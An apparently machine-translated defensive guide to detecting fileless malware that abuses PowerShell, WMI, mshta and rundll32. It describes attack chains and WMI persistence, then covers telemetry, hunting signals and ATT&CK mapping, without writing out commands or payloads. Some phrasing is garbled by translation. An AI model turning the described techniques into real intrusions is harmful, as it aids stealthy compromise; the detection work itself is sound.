How to detect fileless malware: a complete guide to signals, techniques, and defenses

The threat landscape has taken a qualitative leap with malware that lives exclusively in memoryThis type of attack, better known as fileless malware, does not write executables to the disk and abuses legitimate system tools, which makes it extremely difficult to detect using traditional signature-based antivirus software; therefore, it is important to know How to detect and remove suspicious files or malware.

What's relevant is not just its stealth, but the way it relies on trust processes (PowerShell, WMI, mshta, rundll32, among others) and techniques such as "living off the land" to camouflage themselves. Consequently, detection involves observing behaviors, correlating events, and monitoring memory, not searching for suspicious files in the storage.

What is fileless malware and why does it matter?

Any attack that is considered fileless is considered to be It executes malicious code without leaving persistent artifacts on the disk. (or minimizing them as much as possible), relying on binaries already present in the system. It often injects or launches its payload directly into RAM, executing within normal operating system processes, which is why it's key. monitor RAM in real time.

This approach allows you to evade controls that depend on file inspection, from executable whitelists and reputation analysis. Although some attacks manage to be 100% fileless, it is more common for them to combine file-based and fileless phases during the intrusion cycle.

A common characteristic is that the adversary uses command lines and scripting to orchestrate each phase. Since there is no obvious “anomalous file”, signature-based engines have a harder time raising alerts, especially if the activity falls within “normal” parameters for administrative tools.

It is important to keep in mind that, by design, many of these implants have limited persistenceAs soon as the system restarts, the load in RAM disappears. However, attackers often introduce re-entry or thin persistence mechanisms so that access is restored without intervention.

Why is it so difficult to detect?

The first reason is obvious: There is no file to scanIf code lives and dies in memory, disk-centric engines have little to offer, unless there is process, memory, and network telemetry to complement them.

The second reason is the abuse of native and signed processes of the system (PowerShell, WMI, mshta, rundll32, VBScript, JScript, batch interpreters, .NET, etc.). This coexistence with the “legitimate” reduces noise and makes it difficult to distinguish good from bad without behavioral analysis or tools such as Process Hacker.

The third reason is that static firms They don't work well with payloads that are assembled at runtime, obfuscated, or offloaded into memory. In fact, many antivirus programs don't thoroughly inspect real-time in-memory execution.

Furthermore, the rise of targeted campaigns (APTs) and the use of advanced tactics have raised the bar. We have seen attacks that operate on the kernel or through webshellswith minimal forensic trace, further hindering the response if there are not sufficient records and traceability.

How a fileless attack enters and operates

Initial access is usually achieved using classic techniques: Phishing with links or attachments, Office documents with macros or DDE, documents PDF with malicious JavaScript, exploitation of vulnerabilities (including exploit kits), or stolen credentials.

Following the intrusion, an execution chain is triggered that invokes tools such as PowerShell or WMI to download, decrypt, or inject the payload directly into the process's memory. All of this is orchestrated with commands and scripts that, by themselves, may seem like routine administrative operations.

In many campaigns, the attacker looks persist as long as necessary To maintain a backdoor without writing visible executables, scheduled tasks, registry keys, or, especially, WMI event subscriptions are used to reactivate execution upon a specific trigger (e.g., system startup or user login).

If the target rarely restarts—for example, a critical server—the in-memory presence may be problematic. particularly advantageous because it lengthens the adversary's window of opportunity without the need for noisy persistence.

Techniques, variations and real cases

The philosophy “living off the land“(living off the land)” summarizes the approach: the intruder makes use of binaries and functionalities already present in Windows to move, collect, and execute. This reduces the need to "leave" tools on the disk and minimizes their exposure.

Popular techniques include injection in processes existing features, the use of mshta or rundll32 to load code, VBScript/JScript scripts and batch execution, and the presence of Suspicious DLLsAlso seen are payloads embedded in documents that exploit vulnerabilities to gain execution without writing persistent executables.

There are modalities such as the fileless ransomware, which prepares its execution in memory and encrypts data before defenses detect it; another variant abuses the Windows' register to host encrypted configurations or payloads, initializing execution with self-deleting keys.

Notable examples have been documented: webshells like Godzilla that receive modules via HTTP and inject them into memory; the backdoor SMB/Exploit.DoublePulsarcapable of uploading code directly from the network by exploiting SMB 1.0 vulnerabilities; or campaigns of APT29 (The Dukes) like Operation Ghost, with fileless backdoors like RegDuke and POSHSPY.

Persistence: WMI, Logging, and Tasks

To avoid losing access, many attackers configure WMI subscriptions combining event filters and consumers (CommandLineEventConsumer) that launch PowerShell or other actions when a condition is met (e.g., system uptime).

Others choose to establish discrete scheduled tasks or modify the Registry at startup locations. Although the fileless ideal avoids writing to disk, these minimal "crumbs" often appear if durability or re-entry is desired.

Conversely, these techniques leave identifiable artifacts If properly audited: WMI repositories, task definitions, modified Registry keys. Hence the importance of having audit and telemetry policies in place from the very beginning.

It's important to remember that RAM is volatile. Therefore, without persistence, a system resumption It can expel the implant, but don't be overconfident: an attacker with access can reseed using the same technique as soon as they detect the right opportunity.

Corporate risk and why blocking "all at once" is not the answer

Blindly blocking essential tools like PowerShell It can harm IT operations, and even then, it's not enough: there are ways to circumvent the execution policy, load PowerShell via DLL, repurpose scripts, or package them into other executables to avoid basic controls.

The same goes for the Office macrosAlthough it is advisable to disable them as a matter of policy when the business allows it, their detection through signatures or static heuristics is complex and prone to false positives when there is previously unseen or obfuscated code.

Purely detection server-side or cloud-sideWithout prevention at the endpoint, it leads to latency and connectivity dependence; to contain it in time, the endpoint agent must be able to make local decisions with the full context of the system.

Ultimately, the problem is one of visibility and context: we need to understand which process called which one, with what arguments, what keys or tasks it created, what connections it opened, and how the chain of events evolves en There.

Evolution and figures: an upward trend

Fileless campaigns have been growing for years. Some industry reports pointed at the time to 94% increments in fileless attacks in a semester, with PowerShell usage peaks doubling in a matter of weeks (from 2,5 to 5,2 attacks per 1.000 endpoints), a clear reminder that these tactics are a favorite of attackers.

This surge is explained by the combination of offensive maturity, signature coverage failures, the popularity of targeted attacks, and the ease of camouflaging oneself within trusted processes without raising immediate suspicion.

How to really detect fileless malware

The key is to move from identifying “who you are” (file) to observing “what are you doing“(behavior). Real-time endpoint monitoring —memory, process tree, command line, Registry, network activity— allows for the recognition of malicious patterns common to a wide variety of families.

Modern solutions for EDR/XDR and engines of IA Behavioral indicators detect suspicious sequences such as: Office document launching hidden PowerShell with no profile execution, memory download and subsequent injection into another process followed by encryption or exfiltration.

Additionally, it is crucial to enable and centralize logs by PowerShell (v5+ improves traceability), enable Sysmon to enrich events and monitor the WMI repository for unusual subscriptions, consumers, and bindings.

Network analysis adds another layer: inspection of traffic behaviors (C2, exfiltration patterns), prevention of network attacks, and correlation with endpoint events. When malware touches the kernel or navigates protected memory, the network can provide clues that the host doesn't see.

Practical guide to prevention and hunting

Restricts the use of PowerShell and WMI This is for administrators and clear business cases, with AppLocker/WDAC or well-defined and inventoried execution policies. It's not about simply prohibiting, but about regulating, logging, and alerting for deviations.

Disable and control macros Implement Group Policy in Office whenever feasible, and enforce Protected View and digital signatures on templates. Educate users to recognize phishing emails and malicious links, as social engineering remains the preferred entry point.

Apply patches System and application security, prioritizing exposed components (browsers, plugins, Office, .NET, SMB services). Monitors vulnerabilities and reduces the attack surface (disabling SMBv1, for example, if not essential).

Enhance telemetry: Enables advanced PowerShell logging, Sysmon with a fine-tuned rule set, and auditing of Registration and tasks, and periodic WMI queries (e.g., checking __EventFilter, EventConsumer and FilterToConsumerBinding against a known baseline).

Install solutions with memory scan and behavioral analysis capable of detecting loads injected into live processes, and assesses EDR/XDR for continuous threat hunting, process containment, change reversal and equipment isolation when necessary.

Tactical mapping and response

Working with the framework MITRE ATT & CK It helps identify relevant tactics/techniques: execution (T1059), use of PowerShell (T1059.001), WMI (T1047), process injection (T1055), persistence via Registry (T1112) or tasks (T1053), exfiltration (T1041), among others.

In a typical incident, it is important to reconstruct the complete "story": what attachment the user opened, what process launched which one, with what arguments, what artifacts they created, and how the chain propagated. Correlate the entire context It is key to isolating the root culprit and avoiding cutting where it shouldn't be cut.

Some manufacturers have introduced concepts such as “Storyline"To group related processes and correctly attribute the source of the threat. This approach allows mitigation of the entire malicious group, reversal of actions (keys, files, connections), and a clean endpoint without disrupting legitimate processes such as the email client."

The response must be local and quick: if the agent already has the user context, processes, Registry, network and filesIt can block, roll back, and isolate without waiting for decisions in the cloud, which is critical against workloads that only live in memory for seconds.

Examples of detection and signals to monitor

Search for invocations of PowerShell with ExecutionPolicy Bypass, hidden window, without a profile, and downloads memory attacks followed by Start-Process or injection. These are common patterns in attacks originating from documents with macros or DDE.

In WMI, check the namespaces of root\subscription to locate event filters, command-line consumers, and bindings that are not in the baseline. It even creates "defensive" subscriptions that alert you to new suspicious objects.

In the Registry, keep an eye on things. login keys and common persistence locations, and cross-references this with process telemetry. Using Sysmon, it observes process creation with anomalous offspring (Office → PowerShell → cmd → rundll32, etc.).

On a network, it identifies outgoing connections to domains or routes not usual, encrypted payloads or incremental exfiltration, and relates PowerShell/WMI activities to spikes in outbound communications.

Market services and capabilities

There are managed services such as EMDR (Enterprise Managed Detection and Response) that combine proactive detection based on MITRE ATT&CK with real-time response, and SOC 24/7 to monitor, analyze behavior and perform forensics when needed.

On the product level, solutions with behavior detection On the endpoint itself, they are especially effective against fileless attacks because they do not depend on the vector (exploit, macro, PowerShell, PowerSploit, exploit kit or even zero-day vulnerabilities) and can automatically reverse actions.

Beyond marketing, the critical thing is that the agent has all the local context (users, processes, arguments, Registry, files and communications) to make decisions without delays, mitigate, isolate and allow continued work on a clean device.

Historically, campaigns like WannaCry They illustrate the usefulness of this approach: detection and containment by behavior even before having signatures, which significantly reduced the impact on protected organizations.

Detecting fileless malware requires looking at where the action actually occurs: memory, the command line, processes, and their relationship over time. With good logging policies, PowerShell and WMI monitoring, endpoint behavior controls, layered defense, and ATT&CK mapping, it's perfectly achievable. remove the stealth to a threat that, by its nature, prefers to go unnoticed.